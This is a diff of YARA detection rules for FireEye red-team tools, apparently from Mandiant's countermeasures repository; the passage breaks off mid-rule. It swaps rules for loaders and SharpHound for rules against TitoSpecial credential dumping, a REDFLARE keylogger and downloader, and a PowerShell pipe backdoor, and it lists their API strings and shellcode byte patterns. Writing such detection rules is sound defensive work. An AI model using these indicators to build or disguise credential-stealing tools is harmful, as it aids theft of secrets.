+		id = "69745e99-33cc-5171-ae7a-5c98439a0b6d"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/INVEIGHZERO/production/yara/HackTool_MSIL_INVEIGHZERO_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/GETDOMAINPASSWORDPOLICY/production/yara/HackTool_MSIL_GETDOMAINPASSWORDPOLICY_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "5d10557a83dae9508469fe87f4c0c91beec4d2812856eee461a82d5dbb89aa35"
+		logic_hash = "6b2ea3ebfea2c87f16052f4a43b64eb2d595c2dd4a64d45dfce1642668dcf602"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 2
+		rev = 4
 
 	strings:
-		$typelibguid0 = "113ae281-d1e5-42e7-9cc2-12d30757baf1" ascii nocase wide
+		$typelibguid0 = "a5da1897-29aa-45f4-a924-561804276f08" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 10MB and ( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_LUALOADER_1 : FILE
+rule FIREEYE_RT_Hacktool_Win32_Andrewspecial_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'lualoader' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "e8480cf8-1852-5572-8e92-c0ae676b7507"
-		date = "2020-12-08"
+		id = "69e27e92-d68e-5543-bada-170e32733dbb"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LUALOADER/production/yara/APT_HackTool_MSIL_LUALOADER_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/HackTool_Win32_AndrewSpecial_1.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "7e9f9836ec91aa66c8779588cfceff718487f0cb5048d17538c947aba687a4cf"
+		hash = "e89efa88e3fda86be48c0cc8f2ef7230"
+		logic_hash = "529a49fb21250069111d03a174901dc2e1623ee2a1f446aae1bdb1579a227dd3"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 4
 
 	strings:
-		$typelibguid0 = "8b546b49-2b2c-4577-a323-76dc713fe2ea" ascii nocase wide
+		$dump = { 6A 00 68 FF FF 1F 00 FF 15 [4] 89 45 ?? 83 [2] 00 [1-50] 6A 00 68 80 00 00 00 6A 02 6A 00 6A 00 68 00 00 00 10 68 [4] FF 15 [4] 89 45 [10-70] 6A 00 6A 00 6A 00 6A 02 8B [2-4] 5? 8B [2-4] 5? 8B [2-4] 5? E8 [4-20] FF 15 }
+		$shellcode_x86 = { B8 3C 00 00 00 33 C9 8D 54 24 04 64 FF 15 C0 00 00 00 83 C4 04 C2 14 00 }
+		$shellcode_x86_inline = { C6 45 ?? B8 C6 45 ?? 3C C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 33 C6 45 ?? C9 C6 45 ?? 8D C6 45 ?? 54 C6 45 ?? 24 C6 45 ?? 04 C6 45 ?? 64 C6 45 ?? FF C6 45 ?? 15 C6 45 ?? C0 C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 83 C6 45 ?? C4 C6 45 ?? 04 C6 45 ?? C2 C6 45 ?? 14 C6 45 ?? 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and $dump and any of ( $shellcode* )
 }
-rule FIREEYE_RT_APT_Loader_MSIL_LUALOADER_2 : FILE
+rule FIREEYE_RT_Credtheft_MSIL_Titospecial_2 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the TitoSpecial project. There are 2 GUIDs in this rule as the x86 and x64 versions of this tool use a different ProjectGuid."
 		author = "FireEye"
-		id = "f2826dbb-f0a4-5361-94d1-8509c60c4131"
-		date = "2020-12-18"
-		modified = "2020-12-18"
+		id = "0262c720-e6b8-5bf2-a242-19a7f044973f"
+		date = "2020-12-08"
+		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LUALOADER/production/yara/APT_Loader_MSIL_LUALOADER_2.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/CredTheft_MSIL_TitoSpecial_2.yar#L4-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		logic_hash = "700927768669eda6976071306e991bfaae136279f4265980521597c699fbed88"
+		hash = "4bf96a7040a683bd34c618431e571e26"
+		logic_hash = "2f621f8de2a4679e6cbce7f41859eaa3095ca54090c8bfccd3b767590ac91f2c"
 		score = 75
-		quality = 50
+		quality = 71
 		tags = "FILE"
+		rev = 4
 
 	strings:
-		$ss1 = "\x3bN\x00e\x00o\x00.\x00I\x00r\x00o\x00n\x00L\x00u\x00a\x00.\x00L\x00u\x00a\x00C\x00o\x00m\x00p\x00i\x00l\x00e\x00O\x00p\x00t\x00i\x00o\x00n\x00s\x00"
-		$ss2 = "\x19C\x00o\x00m\x00p\x00i\x00l\x00e\x00C\x00h\x00u\x00n\x00k\x00"
-		$ss3 = "\x0fd\x00o\x00c\x00h\x00u\x00n\x00k\x00"
-		$ss4 = /.Reflection.Assembly:Load\(\w{1,64}\);?\s{0,245}\w{1,64}\.EntryPoint:Invoke\(nil/ wide
-		$ss5 = "1F 8B 08 00 00 00 00 00" wide
-		$ss6 = "\x00LoadLibrary\x00"
-		$ss7 = "\x00GetProcAddress\x00"
-		$ss8 = "\x00VirtualProtect\x00"
+		$typelibguid1 = "C6D94B4C-B063-4DEB-A83A-397BA08515D3" ascii nocase wide
+		$typelibguid2 = "3b5320cf-74c1-494e-b2c8-a94a24380e60" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( $typelibguid1 or $typelibguid2 )
 }
-rule FIREEYE_RT_APT_Loader_MSIL_LUALOADER_1 : FILE
+rule FIREEYE_RT_Hacktool_Win64_Andrewspecial_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "970a869e-bd69-5609-bb8d-77bfa78b0630"
-		date = "2020-12-18"
-		modified = "2020-12-18"
+		id = "20ce4902-4eb3-5ecf-aa8c-0515965dde57"
+		date = "2020-11-25"
+		date = "2020-11-25"
+		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LUALOADER/production/yara/APT_Loader_MSIL_LUALOADER_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/HackTool_Win64_AndrewSpecial_1.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		logic_hash = "2d73d434ac39ebde990aca817a54208cd04bfbce33f1bcadcf48a50d9389658c"
+		hash = "4456e52f6f8543c3ba76cb25ea3e9bd2"
+		logic_hash = "96f06c46dfec795fcfd08c188853d0a3f781003ae118833719a175eb59049c0d"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
+		rev = 5
 
 	strings:
-		$sb1 = { 1? 72 [4] 14 D0 [2] 00 02 28 [2] 00 0A 1? 8D [2] 00 01 13 ?? 11 ?? 1? 1? 14 28 [2] 00 0A A2 11 ?? 1? 1? 14 28 [2] 00 0A A2 11 ?? 28 [2] 00 0A 28 [2] 00 0A 80 [2] 00 04 7E [2] 00 04 7B [2] 00 0A 7E [2] 00 04 11 ?? 11 ?? 6F [2] 00 0A 6F [2] 00 0A }
-		$ss1 = "\x3bN\x00e\x00o\x00.\x00I\x00r\x00o\x00n\x00L\x00u\x00a\x00.\x00L\x00u\x00a\x00C\x00o\x00m\x00p\x00i\x00l\x00e\x00O\x00p\x00t\x00i\x00o\x00n\x00s\x00"
-		$ss2 = "\x19C\x00o\x00m\x00p\x00i\x00l\x00e\x00C\x00h\x00u\x00n\x00k\x00"
-		$ss3 = "\x0fd\x00o\x00c\x00h\x00u\x00n\x00k\x00"
-		$ss4 = /.Reflection.Assembly:Load\(\w{1,64}\);?\s{0,245}\w{1,64}\.EntryPoint:Invoke\(nil/ wide
-		$ss5 = "1F 8B 08 00 00 00 00 00" wide
+		$dump = { 33 D2 B9 FF FF 1F 00 FF 15 [10-90] 00 00 00 00 [2-6] 80 00 00 00 [2-6] 02 00 00 00 45 33 C9 45 33 C0 BA 00 00 00 10 48 8D 0D [4] FF 15 [4-120] 00 00 00 00 [2-6] 00 00 00 00 [2-6] 00 00 00 00 41 B9 02 00 00 00 [6-15] E8 [4-20] FF 15 }
+		$shellcode_x64 = { 4C 8B D1 B8 3C 00 00 00 0F 05 C3 }
+		$shellcode_x64_inline = { C6 44 24 ?? 4C C6 44 24 ?? 8B C6 44 24 ?? D1 C6 44 24 ?? B8 C6 44 24 ?? 3C C6 44 24 ?? 00 C6 44 24 ?? 00 C6 44 24 ?? 00 C6 44 24 ?? 0F C6 44 24 ?? 05 C6 44 24 ?? C3 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and $dump and any of ( $shellcode* )
 }
-rule FIREEYE_RT_Hacktool_MSIL_Keepersist_1 : FILE
+rule FIREEYE_RT_Credtheft_MSIL_Titospecial_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'KeePersist' project."
+		description = "This rule looks for .NET PE files that have the strings of various method names in the TitoSpecial code."
 		author = "FireEye"
-		id = "950a4744-2696-5eb7-8524-7f689cb5dbb0"
+		id = "932bb013-03de-5cf7-89e9-b3232151d303"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/KEEPERSIST/production/yara/HackTool_MSIL_KeePersist_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/CredTheft_MSIL_TitoSpecial_1.yar#L4-L27"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "eae67c77a64ca07f9ef59a356bb2c3f3131f14e7f17c898ef8857a21090ace0e"
+		hash = "4bf96a7040a683bd34c618431e571e26"
+		logic_hash = "4ac9a5ede4aea5d73545b459eb635f87ce08ba521afa48b76d2cfa94f1379226"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 4
 
 	strings:
-		$typelibguid0 = "1df47db2-7bb8-47c2-9d85-5f8d3f04a884" ascii nocase wide
+		$str1 = "Minidump" ascii wide
+		$str2 = "dumpType" ascii wide
+		$str3 = "WriteProcessMemory" ascii wide
+		$str4 = "bInheritHandle" ascii wide
+		$str5 = "GetProcessById" ascii wide
+		$str6 = "SafeHandle" ascii wide
+		$str7 = "BeginInvoke" ascii wide
+		$str8 = "EndInvoke" ascii wide
+		$str9 = "ConsoleApplication1" ascii wide
+		$str10 = "getOSInfo" ascii wide
+		$str11 = "OpenProcess" ascii wide
+		$str12 = "LoadLibrary" ascii wide
+		$str13 = "GetProcAddress" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of ( $str* )
 }
-rule FIREEYE_RT_Hacktool_MSIL_Sharpschtask_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_TITOSPECIAL_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharpSchtask' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "5c7a5dee-3bc2-54b2-a7e2-be05ba74d4a1"
-		date = "2020-12-08"
+		id = "b12490ba-41f6-5469-bcbb-0d2e0055c193"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSCHTASK/production/yara/HackTool_MSIL_SharpSchtask_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/APT_HackTool_MSIL_TITOSPECIAL_1.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "7437fde82920f4d015a7f149b58924baf6cb220c6f6857d9509e23795ff0811c"
+		hash = "4bf96a7040a683bd34c618431e571e26"
+		logic_hash = "6def0c667d38c1bad9233628e509bdcaed322e75be4ff3823b0f788c391e090c"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 5
 
 	strings:
-		$typelibguid0 = "0a64a5f4-bdb6-443c-bdc7-f6f0bf5b5d6c" ascii nocase wide
+		$ind_dump = { 1F 10 16 28 [2] 00 0A 6F [2] 00 0A [50-200] 18 19 18 73 [2] 00 0A 13 [1-4] 06 07 11 ?? 6F [2] 00 0A 18 7E [2] 00 0A 7E [2] 00 0A 7E [2] 00 0A 28 [2] 00 06 }
+		$ind_s1 = "NtReadVirtualMemory" fullword wide
+		$ind_s2 = "WriteProcessMemory" fullword
+		$shellcode_x64 = { 4C 8B D1 B8 3C 00 00 00 0F 05 C3 }
+		$shellcode_x86 = { B8 3C 00 00 00 33 C9 8D 54 24 04 64 FF 15 C0 00 00 00 83 C4 04 C2 14 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of ( $ind* ) and any of ( $shellcode* )
 }
-rule FIREEYE_RT_Hacktool_MSIL_Sharphound_3 : FILE
+rule FIREEYE_RT_Loader_MSIL_Csharpsectioninjection_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'C_Sharp_SectionInjection' project."
 		author = "FireEye"
-		id = "456b3208-1e8d-5eb7-81ee-39f1c886c5a7"
+		id = "ca5bf5cd-1950-53ed-8984-e880a15e658e"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PUPPYHOUND/production/yara/HackTool_MSIL_SharpHound_3.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSECTIONINJECTION/production/yara/Loader_MSIL_CSharpSectionInjection_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "eeedc09570324767a3de8205f66a5295"
-		logic_hash = "baeea6cae42c755ee389378229b2b206c82f60f75a5ce5f9cfa06871fc9507d1"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "011cf4dffe6ef90a79cdfabb0e297152c00b0404b1801f56fd7e703ab90b1692"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 4
+		rev = 2
 
 	strings:
-		$typelibguid1 = "A517A8DE-5834-411D-ABDA-2D0E1766539C" ascii nocase wide
+		$typelibguid0 = "d77135da-0496-4b5c-9afe-e1590a4c136a" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Puppyhound_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win32_REDFLARE_1 : FILE
 {
 	meta:
-		description = "This is a modification of an existing FireEye detection for SharpHound. However, it looks for the string 'PuppyHound' instead of 'SharpHound' as this is all that was needed to detect the PuppyHound variant of SharpHound."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "1155f959-c8bc-597a-8a80-abee8d95b6ec"
-		date = "2020-12-08"
+		id = "b8a2c388-3b27-5075-b0ee-2773ae0c67ad"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PUPPYHOUND/production/yara/HackTool_MSIL_PuppyHound_1.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win32_REDFLARE_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "eeedc09570324767a3de8205f66a5295"
-		logic_hash = "39073bbfef15ecd28c1772e5d01e54c3d5774ecb4c90f0076bda5dc400abacba"
+		hash = "01d68343ac46db6065f888a094edfe4f"
+		logic_hash = "f9165aabe4bad215211cf98559099030ddb8a76175fbfcfee3c6f25d7614bdad"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		rev = 6
+		rev = 1
 
 	strings:
-		$1 = "PuppyHound"
-		$2 = "UserDomainKey"
-		$3 = "LdapBuilder"
-		$init = { 28 [2] 00 0A 0A 72 [2] 00 70 1? ?? 28 [2] 00 0A 72 [2] 00 70 1? ?? 28 [2] 00 0A 28 [2] 00 0A 0B 1F 2D }
-		$msil = /\x00_Cor(Exe|Dll)Main\x00/
+		$alloc_n_load = { 6A 40 68 00 30 00 00 [0-20] 6A 00 [0-20] FF D0 [4-60] F3 A4 [30-100] 6B C0 28 8B 4D ?? 8B 4C 01 10 8B 55 ?? 6B D2 28 }
+		$const_values = { 0F B6 ?? 83 C? 20 83 F? 6D [2-20] 83 C? 20 83 F? 7A }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
 }
-rule FIREEYE_RT_APT_Backdoor_PS1_BASICPIPESHELL_1
+rule FIREEYE_RT_APT_Keylogger_Win32_REDFLARE_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "8f85d6cc-fd1e-5bf3-8052-440cbeda0ac9"
-		date = "2020-12-18"
-		modified = "2020-12-18"
+		id = "ad14db66-d640-5712-b2c8-a3d42d5a90f3"
+		date = "2020-12-01"
+		date = "2020-12-01"
+		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BASICPIPESHELL/production/yara/APT_Backdoor_PS1_BASICPIPESHELL_1.yar#L5-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Keylogger_Win32_REDFLARE_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		logic_hash = "7a9f0002055ffe826562cab3d02d8babd14c5fcd6d0b528a2988e2649034279d"
+		hash = "d7cfb9fbcf19ce881180f757aeec77dd"
+		logic_hash = "aebbaa050bee3775ffac4214ea4ab58284384e7eb41e66ee4838b9359e72821e"
 		score = 75
-		quality = 63
-		tags = ""
+		quality = 75
+		tags = "FILE"
+		rev = 2
 
 	strings:
-		$s1 = "function Invoke-Client()" ascii nocase wide
-		$s2 = "function Invoke-Server" ascii nocase wide
-		$s3 = "Read-Host 'Enter Command:'" ascii nocase wide
-		$s4 = "new-object System.IO.Pipes.NamedPipeClientStream(" ascii nocase wide
-		$s5 = "new-object System.IO.Pipes.NamedPipeServerStream(" ascii nocase wide
-		$s6 = " = iex $" ascii nocase wide
+		$create_window = { 6A 00 68 [4] 6A 00 6A 00 68 00 00 00 80 68 00 00 00 80 68 00 00 00 80 68 00 00 00 80 68 00 00 CF 00 68 [4] 68 [4] 6A 00 FF 15 }
+		$keys_check = { 6A 14 [0-5] FF [1-5] 6A 10 [0-5] FF [1-5] B9 00 80 FF FF 66 85 C1 75 ?? 68 A0 00 00 00 FF [1-5] B9 00 80 FF FF 66 85 C1 75 ?? 68 A1 00 00 00 FF [1-5] B9 00 80 FF FF 66 85 C1 74 }
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
 }
-rule FIREEYE_RT_Loader_MSIL_Netassemblyinject_1 : FILE
+rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_7 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'NET-Assembly-Inject' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "62a7dc4c-678b-5f13-9661-4679eafe1c72"
-		date = "2020-12-08"
+		id = "f891e477-9ff2-57be-9ca5-dd87d9baee29"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/NETASSEMBLYINJECT/production/yara/Loader_MSIL_NETAssemblyInject_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_7.yar#L4-L21"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "9a43df9ee26a44f4db5c2d22fbc1a6c86c5af0c9d44a79c6627a4cc8cf31bb8d"
+		hash = "e7beece34bdf67cbb8297833c5953669, 8025bcbe3cc81fc19021ad0fbc11cf9b"
+		logic_hash = "6d7822256ac1bef05304d3396df773e2b20a397311ad820d6ec5fe4cb6bdfbbc"
 		score = 75
-		quality = 69
+		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 1
 
 	strings:
-		$typelibguid0 = "af09c8c3-b271-4c6c-8f48-d5f0e1d1cac6" ascii nocase wide
-		$typelibguid1 = "c5e56650-dfb0-4cd9-8d06-51defdad5da1" ascii nocase wide
-		$typelibguid2 = "e8fa7329-8074-4675-9588-d73f88a8b5b6" ascii nocase wide
+		$1 = "initialize" fullword
+		$2 = "getData" fullword
+		$3 = "putData" fullword
+		$4 = "fini" fullword
+		$5 = "NamedPipe"
+		$named_pipe = { 88 13 00 00 [1-8] E8 03 00 00 [20-60] 00 00 00 00 [1-8] 00 00 00 00 [1-40] ( 6A 00 6A 00 6A 03 6A 00 6A 00 68 | 00 00 00 00 [1-6] 00 00 00 00 [1-6] 03 00 00 00 45 33 C? 45 33 C? BA ) 00 00 00 C0 [2-10] FF 15 [4-30] FF 15 [4-7] E7 00 00 00 [4-40] FF 15 [4] 85 C0 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Dropper_LNK_Lnksmasher_1 : FILE
+rule FIREEYE_RT_APT_Downloader_Win64_REDFLARE_1 : FILE
 {
 	meta:
-		description = "The LNKSmasher project contains a prebuilt LNK file that has pieces added based on various configuration items. Because of this, several artifacts are present in every single LNK file generated by LNKSmasher, including the Drive Serial #, the File Droid GUID, and the GUID CLSID."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "1b93ddf8-9578-5e47-b479-4c9e8a40b4f4"
-		date = "2020-12-08"
+		id = "15a5e22b-84b0-5b36-8772-1d496ac447b2"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LNKSMASHER/production/yara/Dropper_LNK_LNKSmasher_1.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Downloader_Win64_REDFLARE_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "0a86d64c3b25aa45428e94b6e0be3e08"
-		logic_hash = "61d1ac67ac0d332ad842a522cbebe1b9af1482d58a210b50fb45209355c0aeeb"
+		hash = "9529c4c9773392893a8a0ab8ce8f8ce1"
+		logic_hash = "1b9bece6083403615841c752eac48fd20095e918d6e175563dd122be2885d875"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 6
+		rev = 2
 
 	strings:
-		$drive_serial = { 12 F7 26 BE }
-		$file_droid_guid = { BC 96 28 4F 0A 46 54 42 81 B8 9F 48 64 D7 E9 A5 }
-		$guid_clsid = { E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30 30 9D }
-		$header = { 4C 00 00 00 01 14 02 }
+		$const = "Cookie: SID1=%s" fullword
